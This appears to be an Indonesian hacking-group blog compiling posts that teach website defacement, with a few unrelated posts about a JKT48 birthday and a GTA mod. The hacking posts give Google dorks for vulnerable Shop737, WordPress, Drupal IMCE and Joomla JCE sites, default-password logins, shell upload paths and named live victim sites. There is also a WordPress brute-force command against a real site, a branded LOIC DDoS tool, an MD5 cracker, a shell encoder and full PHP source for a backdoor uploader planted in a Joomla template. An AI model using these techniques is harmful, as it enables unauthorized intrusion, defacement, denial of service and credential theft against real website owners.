Deface Dengan Upload File On Shop737

Selamat siang sobat IDCA :D

hehe, sebelumnya itu judulnya bener ngak yaa >.< karena saya ngak bisa bahasa inggris sih jadi mohon maaf jika salah hehe, oke langsung aja kali ini saya mau kasih tau trik deface kayaknya sih udah cukup lama dishare, tapi karena ngak ada kerjaan yaah utek utek blog lagi deh :D

[+] TUTORIAL [+]

1. Cari target dengan dork :

• intext:"Powered by Shop737" (klik)

dork bisa dikembangin sendiri OK :)

2. Setelah itu ilih salah satu website yang ada di google tadi 

• saya pilih http://balimalio.com/poto/

3. Setelah kalian memilih targetnya, lalu masukan Exploit berikut :

• localhost/poto/upload.php , contoh => http://balimalio.com/poto/upload.php

4. Jika disuruh memasukan user + pass , silahkan isi :

• user : admin
• pass : admin

5. Setelah berhasil masuk tampilan akan seperti dibawah ini, jika gagal cari web lain :P

#Catatan :

No 1 : upload file txt/image (*ngak bisa php/html)

No 2 : pilih di Kategori mana file kalian di upload

No 3 : Klik Upload

6. Jika sudah keluar tulisan succes, buka hasil uploadan kalian di :

• localhost/poto/[Kategori]/file.txt ~> http://balimalio.com/poto/Sabun/garuda.txt

Contoh punya saya :

Sekian tutorial "Deface Dengan Upload File On Shop737" , jika ada yang kurang jelas silahkan tanyakan di kotak komentar :)

Content Creator : Bimo Septiawan

DDoS Tools - LOIC JKT48 CYBER TEAM

Beberapa hari yang lalu saya sempat share Privat Shell JKT48 CYBER TEAM. Nah, kemarin ternyata ada yang kreatif buat Tools DDoS JKT48 CYBER TEAM juga. Fungsi masih sama seperti Low Orbit Ion Cannon dari praetox.com [versi asli]. Namun perbaikan tampilan dengan penambahan Logo JKT48CT.

Tools ini dibuat oleh x1L3nT7, salah satu member JKT48 CYBER TEAM.

Ini tampilan toolsnya :

LOIC JKT48

Untuk link download silahkan Klik Disini :

Download DDoS Tools - LOIC JKT48CT



Untuk cara penginstalan :



1.buka LOIC JKT48.rar

2.extract folder LOIC ke folder yang kakak inginkan

3.buka folder yang sudah diextrack tadi

4.click setup.exe



kalau cara penggunaan sama dengan LOIC biasa. Lihat Disini



Sekian postingan kali ini. Semoga bermanfaat. :)

Hack Wordpress Dengan Teknik BruteForce

Sebelumnya perlu diketahui, yeng namanya teknik bruteforce memerlukan kesabaran dan juga sedikit keberuntungan. Keberhasilan ditentukan pula dengan banyaknya kata dalam kamus wordlist anda. Faktor face juga berpengaruh. :v . Kalau orangnya jelek biasanya gagal terus. Tapi kalau ganteng kaya saya sih berhasil terus. :p - yang ini cuekin aja.

Oke, langsung saja.

Bahan : WPBforce - Password RAR : www.madura-cyber.org

Di dalam nya sudah terdapat Tools Bruteforce beserta list passwordnya. Jika sobat punya list password yang lebih lengkap, sobat bisa menggantinya.



Langkah-langkah :

Pertama, download tools bruteforcenya lalu ekstrak di folder C: . Jadinya C:\WPBrute\

Lalu buka CMD. Untuk mempercepat langsung saja klik Home+R -> Ketik : CMD

Setelah CMD terbuka, panggil FPBforce dengan command berikut : C:\WPBrute\WPBforce.exe

Untuk lebih jelasnya, lihat gambar :

Step 1

Jika benar WPBForce akan terbuka.

Step 2

Lalu ketik command : cd WPBrute

Step 3

Oke, sekarang saatnya mencari target. Tidak perlu menggunakan dork google, yang penting site wordpress pasti bisa dihack dengan teknik ini.

Pertama, masuk ke site/wp-login.php . Lalu masukkan user : admin - password : [silahkan diisni ngasal]

Jika ada warning berikut : ERROR: Incorrect password. Lost your password? , berarti teknik ini masih bisa dilanjutkan. kenapa, karena itu tandanya user admin benar, hanya passwordnya yang salah.

Untuk contoh, target saya adalah : http://rotoduck.com



Sekarang kita kembali ke tools WPBrute.

Setelah step 3 dilakukan, saatnya kita mengeksekusi target dengan command berikut :

WPBforce.exe -url=http://www.rotoduck.com -user=admin -pass=wordlist.txt -threads=10

Lihat SS :

Lalu klik enter. Maka broses brute akan berjalan. Tunggu yang sabar.

Jika proses brute sudah selesai/password sudah ditemukan, maka hasilnya seperti ini :

Game Over.

User -> admin

Pass -> 123



Sekarang tinggal login di www.rotoduck.com/wp-login.php dengan username dan password yang sudah didapat.

Dan hasilnya, masuk dashboard tuh. :p

Kalo sudah begitu ya terserah mau diapain. :D



Sekian.

Created by Nabilaholic - Madura Cyber

Exploit Wordpress Plugins Shell Upload Vulnerability

Assalamualaikum...

Pagi2 lagi ga ada kerjaan, udah gitu ga bisa tidur, ya udah keliling jalan2 di google, alhasil nemu nih Exploit, walaupun bukan hal baru, tapi setidaknya bisa dijadikan pembelajaran dan pengetahuan bagi kita semua.. karena kita tau bahwa suatu bugs itu selalu ada saja yang ditemukan, dan konsepnya tidak jauh berbeda. maka dari itu penting sekali untuk mengetahui kelemahan ini agar bisa dijadikan sumber dan dimanfaatkan untuk kepentingan bersama 3:) wwkkwkwkkk :D v

ya sudah di simak aja :) ini mah ga jauh berbeda ma postingan si Bimo yang sebelumnya :)

Dork : inurl:"/wp-content/plugins/spotlightyour/"

Dorknya kembangin sendiri, karena saya suka males utak atik dork :p

Langkah-langkahnya sebagai berikut:

Pertama yah seperti biasa, gunakan dork diatas untuk mencari target yang sesuai di google ::)

Selanjutnya pilih salah satu target, kalo saya pilih http://www.erisonic.com/ sebagai contoh..
Setelah itu kita ubah "/wp-content/plugins/spotlightyour/monetize/upload/" jadinya begini:

http://www.site.com/wp-content/plugins/spotlightyour/monetize/upload/

Lalu muncul tempat upload file, tinggal upload aja shell sobat.. tapi kalo ga muncul silahkan cari target yang lain :p

Tunggu aja prosesnya, kalo uploadnya lama, berarti ga bisa, silahkan cari target yg lain,,.. tapi kalo proses upload berhenti, berarti itu tandanya shell berhasil di upload!

Nah tinggal Eksekusi dah shell sobat, tempat shell sobat berada di: http://site.com/wp-content/uploads/tahun/bulan/shell.php sebagai contoh:

http://www.site.com/wp-content/uploads/2013/05/shell.php

Nah selanjutnya terserah aja, kalo mau didepes cukup upload file index.html :)

Sekian tutorial cupu dari saya, mudah2an bermanfaat aja, kalo ada pertanyaan,

silahkan tanyakan dikomentar :)
 

Content Creator : Onix AQua

Drupal IMCE Mkdir Remote File Upload Vulnerability

Assalamualaikum..

Selamat pagi? ternyata udah pagi :3 sekedar berbagi daripada ga sama sekali :D

Yup, tetep semangat berbagi, tapi jangan pada ngiri :( langsung aja dah, udah ngantuk :p

Google Dork : inurl:"/imce?dir="

Cari target dulu gih :) pake noh google dork nya yah :p

Nah, buka dah satu2 targetnya, yg sabar aja nyarinya :p  disini saya nemu satu aja sebagai contoh, lalu klik upload!

upload dah file sobat, dan tunggu hasilnya :p filetype yg boleh diupload : txt,php,jpg,dll

kalo udah berhasil upload file, cari file sobat disini:

http://www.site.com/files/filesobat

Begitu aja yah, udah ngantuk banget :( moga bermafaat aja :D kalo ga ngerti harap dimaklumi :p

Content Creator : Onix AQua

Happy Birthday Cindy Gulla

Hari ini salah satu personil JKT48 yaitu Cindy Gulla berulang tahun yang ke 16. Selamat ulang tahun ya Cindy. Semoga di umur yang ke 16 ini membuat kamu semakin dewasa dan semakin dekat dengan fans.

Kita emang nggak bisa ngasih apa-apa. Cuma bisa nagsih do'a semoga kamu selalu dalam lindungan Tuhan. :) .

Cindy Gulla

Cuma bisa ngasih ini doang.

Cpanel Cracked for Cindy Gulla - portal.madura-cyber.org . Maaf kalo scriptnya jelek. :)



Sekalian mau ngasih info, mungkin seminggu kedepan saya tidak aktif ngeblog karena harus mempersiapkan untuk menghadapi Ujian Kenaikan Kelas.

See You Later.

Auto Encode Php (Shell)

Selamat malam sobat IDCA :D

Pada kesempatan kali ini saya akan memberitau cara encode shell kalian yang berat aslinya bisa mencapai 500kb menjadi sekitar 2kb :D

Nah pasti pada seneng kan kalo hasil shell kalian itu lebih ringan untung di upload waktu sedang beraksi ? so yang berminat bikin shell juga silahkan baca tutorial berikut ini :

Basa Basi :
"Tools online ini dibuat oleh teman saya "Ade Hendra Surya Nugraha" , tuh orang pinter tapi ngak sombong makanya saya sering repotin dia hahahaha *bercanda)

Oke bosen yaa liat coretan gaje ini ? masalahnya simple sih jadi biar artikel berasa panjang haha :D

[+] LANGKAH [+]

1. Siapin shell yang mau kalian Encode (*contoh shell saya)

2. Kunjungi website "Hiddenymouz" setelah itu klik ~> Encode

3. Setelah itu, pilih shell kalian yang ingin di Encode , lalu masukin angka yang ada disana di kolom yang disediakan, next klik SUBMIT (*tampilan)

4. Jika selesai nanti akan otomatis ke Download kok :) (*hasil)

selesai tuh :D

hasil uploadnya juga berjalan tuh :)

Sekian tutorial dari saya, jika kurang jelas silahkan tanyakan :)

Thanks to : Ade Hendra Surya Nugraha dan ID Ozie

Content Creator : Bimo Septiawan

Cara Pasang Shell [Backdoor] di Web CMS Joomla dengan E1nzte1N Uploader

Beberapa waktu yang lalu saya pernah share cara upload backdoor web CMS Joomla. Klik Disini. Cara tersebut yaitu dengan mengatur konfigurasi agar file .php bisa dieksekusi. Namun pada beberapa versi Joomla, pengaturan tersebut tidak ada. Sehingga saat kita mencoba mengupload file .php , hasilnya adalah gagal.

Lalu bagaimana ? Tenang. Ada cara lain. Yaitu dengan memasang E1nzte1N Uploader. Sebenarnya ini trik lama. Namun mungkin ada yang belum tau. ekedar info, script uploader ini ditemukan oleh bang E1nzte1N. Dia member paling maho di Hacker Newbie. :v

Oke, langsung saja.

Bahan : E1nzte1n Uploader - Klik disini



Saya asumsikan sobat sudah login ke Web Joomlanya. :D

Lalu klik Extensions -> Template Manager

Step 1

Lalu kita pilih template administrator yang sedang aktif. Template aktif ditandai dengan Location : Administrator | dan Default : berbintang

Lihat gambar :

Step 2

Untuk SS diatas, klik menu Bluestork [tergantung template yang aktif]. Disamping kanan tulisan Administrator.

Oke. Lalu pilih Edit main page template

Lihat gambar :

Step 4

Lalu copy script e1nzte1n Uploader dibagian bawah HTML aslinya.

E1nzte1n Uploader Script :

<?php<br />echo '<b>E1nzte1N uploader</b>';<br /><br />echo '<b><br><br>'.php_uname().'<br></b>';<br /><br />echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><br />';<br /><br />echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form><br />';<br /><br />if( $_POST['_upl'] == "Upload" ) {<br /><br />if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES Dab!!!</b><br><br>'; }<br /><br />else { echo '<b>JANCOOK !!! Upload GAGAL !!!</b><br><br>'; }<br /><br />}<br /><br />?>

Lihat Gambar :

Step 4 - Step 5

Klik Save and Close.

maka kalian akan menemukan uploader dibawah templatenya.

Lihat gambar.

Sukses.

Kalian bisa menupload Shell Backdoor kalian dari situ. :D

Jika berhasil, akan ada notice seperti ini :

Upload SUKSES Dab!!

Lihat SS :

Sekarang tinggal akses shellnya. Shell terletak di [localhost]/administrator/shell.php

JKT48 WebShell

Kalo sudah begitu ya terserah mau diapain. Tapi karena ini lagi galau gara gara Fisika remidi, ya langsung hajar. :v

Oi oi oi

Sekian tutorial kali ini. Semoga bermanfaat.

Wordpress Themes Upload Vulnerabily

Selamat malaaaaam sobat IDCA =))

lama banget ane k posting :D *lebay -_-
Langsung saja yaaa, ane mau share trik deface lagi, tapi trik ini sebenernya udah jadul sih tapi bagi yang belum tau silahkan baca tutorial berikut ini :D

Dork :

• inurl:/wp-content/themes/KidzStore
• inurl:/wp-content/themes/WpStore
• inurl:/wp-content/themes/eCommerce
• inurl:/wp-content/themes/eShop
• inurl:/wp-content/themes/emporium
• inurl:/?=cart intext:"Sorry, the Cart is empty. Select Products via Continue Shopping."

untuk dork bisa kalian kembangin sendiri okey =))

[+] LANGKAH - LANGKAH [+]

1. Copy dan paste kan ke google salah satu dork diatas

2. Lalu pilih salah satu, disini saya mengambil contoh http://www.laptopreplacementscreen.com/

3. Setelah itu kalian buka sourcenya caranya tekan CTRL+U , Setelah itu cari sebuah link di source tersebut contoh punya saya "https://www.laptopreplacementscreen.com/wp-content/themes/WPStore/style.css"

5. Setelah itu kalian ubah menjadi "wp-content/themes/[path]/upload/

• www.laptopreplacementscreen.com/wp-content/themes/WPStore/upload

6. Jika uploadnya lama, berati tandanya ngak bisa, tapi kalo cepat berati berhasil terupload (*tergantung size file yang di upload sih) jika sudah cara memanggilnya seperti ini :

• localhost/wp-content/uploads/products_img/SHELL.php

maka hasilnya akan seperti ini :

nah tinggal tebas tuh :D

oke sekian tutorial newbie dari saya, jika kurang jelas silahkan tanyakan di komentar =))

Content Creator : Bimo Septiawan

Vandetta Mask for GTA San Andreas

Kalo yang ini pasti udah pada tau. Mask Vandetta a.k.a Topeng Anonymous. Ini modifikasi untuk GTA San Andreas. Lumayan susah nyari di Google. Untung ketemu juga di Mods. Langsung aja nih SS nya :

Nih link Downloadnya :

Download Vandetta Mask for GTA SA

Password : maduracyber



Seperti biasa, tutorial install ada didalam. Just info, ini topeng bisa dibeli di Toko BINCO, di kota Los Santos [Kota Pertama] 



Download Topeng Anonymous untuk GTA SA - Download Topeng Vandetta untuk GTA SA 

Crack Hash Tanpa Wordlist | MD5 Bruteforce

Assalamualaikum...

Hayoo,, Siapa yg suka make SQL Injection? pasti kendalanya saat Crack password Hashnya kagak temu,, wkwkwk yang sabar yah, kalo ga bisa di crack ya udah tinggalin aja :p

Eiiit,, bentar dolo, ni ane punya tools buat crack Hash MD5 tanpa menggunakan wordlist, kali aja berguna :) jadi ga repot2 dah ngumpulin banyak wordlist ampe gigaan sizenya.. punya saya 1 GB wkwkk :p


MD5 Bruteforce | Download


kalo udah download langsung aja dah dibuka pake Terminal :) caranya liat gambar aja :)

Nah Selanjutnya kita masukkan perintahnya : md5.exe -h hashsobat -c karakter

Katerangan :

-c aA0~

a   set a untuk karakter huruf kecil
A   set A untuk karakter huruf kapital
0   set 0 untuk karakter angka / digit
~   set ~ untuk karakter simbol khusus

-C "abc23#"       karakter tambahan
-X "0D0A00"       karakter dalam bentuk Hex

usage:

md5.exe -h 827ccb0eea8a706c4c34a16891f84e7b -c 0

Selanjutnya tinggal nunggu hasilnya aja :)

Nah tuh,, udah ketemu passnya ga nyampe 1 detik :)

Catatan: dengan metode Bruteforce ini kemungkinan berhasil adalah 100%!! Hanya saja membutuhkan waktu yang lama. Lamanya proses cracking tergantung dari spesifikasi kompie/lappie sobat serta kombinasi password! Semakin rumit kombinasi passwordnya maka semakin lama pula proses cracking untuk mendapatkan hasilnya, bisa hanya sekitar 1 detik, 1 menit, 1 jam, 1 hari, 1 minggu, 1 bulan, bahkan bisa nyampe 1 tahun ? :o kecuali kalo sobat punya Super Komputer, apapun kombinasi passwordnya bisa sobat crack hanya memerlukan beberapa waktu aja :D

Yah begitulah, tak ada yang mudah dalam dunia hacking, tapi disitulah letak seni nya, semakin sulit maka akan semakin menarik :)


Sekian tutorial saya, moga bermanfaat aja :)


Content Creator : Onix AQua

Cara Mudah Deface Website Dengan Exploit Joomla JCE Extension | Remote File Upload Vulnerability

Assalamualaikum...

Salam sejahtera buat kita semua :)

Oke sobat, sebenarnya udah lama sih mau share teknik ini,  cuma saya males aja mau nyari targetnya,, wkwkwk soalnya saya jarang nemu target yg Vuln, jadi males dah,, tapi berkat bantuan dari temen saya yaitu om Agam yang dengan sukarela memberikan live target yang bisa sobat gunakan :D jadi mempermudah saya untuk berbagi teknik ini buat sobat2 semua :) Thanks to Om  Agam dan perlu sobat ketahui bahwa pada CMS joomla itu yang paling banyak ditemukan bugsnya itu di component atau Extensinya, rata2 pasti begitu :)

Udah ah ngomel2nya, langsung saja kita praktekkan :) Disini saya akan menjelaskan dua Teknik yang berbeda tapi Konsepnya sama aja sih :D beda toolsnya aja :p

Bahan-Bahan :

JCE Exploiter | Download

JCE Exploiter PHP | Download


Dork :  

inurl:"/index.php?option=com_jce"
inurl:index.php?option=com_virtuemart
 

Live Target :  Lihat


Udah disiapin kan bahan2nya? lanjut yuk masak2nya? Hajiahh :3


Pertama so pasti sobat harus mencari targetnya dulu di Google dengan menggunakan dork diatas :) kalo saya udah nemu tuh :D

Lalu Extrack dulu file JCE Exploiternya :)

Buka deh JCE Exploiternya :) dan Selanjutnya masukan Targetnya, lalu klik Start

Nah tuh, udah berhasil :)

Setelah berhasil exploitasinya lalu eksekusi link tersebut :)

Nah, upload aja shell sobat :)  
Catatan: "kalo ga bisa upload Shell, upload aja file depesan .php  .html / .txt :)

Kalo upload shellnya berhasil, tinggal eksekusi shell, trus Tebas dah :D

Cara Kedua

Upload dulu JCE Exploit PHP di  Hostingan atau apapun dah :) kalo ga mau repot, sobat bisa make punya saya aja Disini

Catatan : Rubah extensi Shellnya dulu menjadi  jpg/gif. contoh : shell.jpg / shell.gif

Lalu masukkan targetnya :

Hostname : Web Target [tanpa http:// dan / ]
Path : / atau /path/
Please Specify a file to upload : Shell.jpg sobat :)

Yang lain, kosongin aja :) lalu klik Start

Nah tuh udah keliatan hasilnya :)

Langsung dah, eksekusi shellnya dan upload file depesan sobat :)

Sekian Tutorialnya, mudah2an bermanfaat buat pembelajaran :) untuk mempermudah pencarian target yg vuln JCE, silahkan gunakan tool scanner di artikel Tools Scanner JCE

Quote: "Dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!" By Onix AQua 

Kalo ada pertanyaan silahkan tinggalkan komentar atau langsung tanya di grup aja :) Terimakasih :)

Content Creator : Onix AQua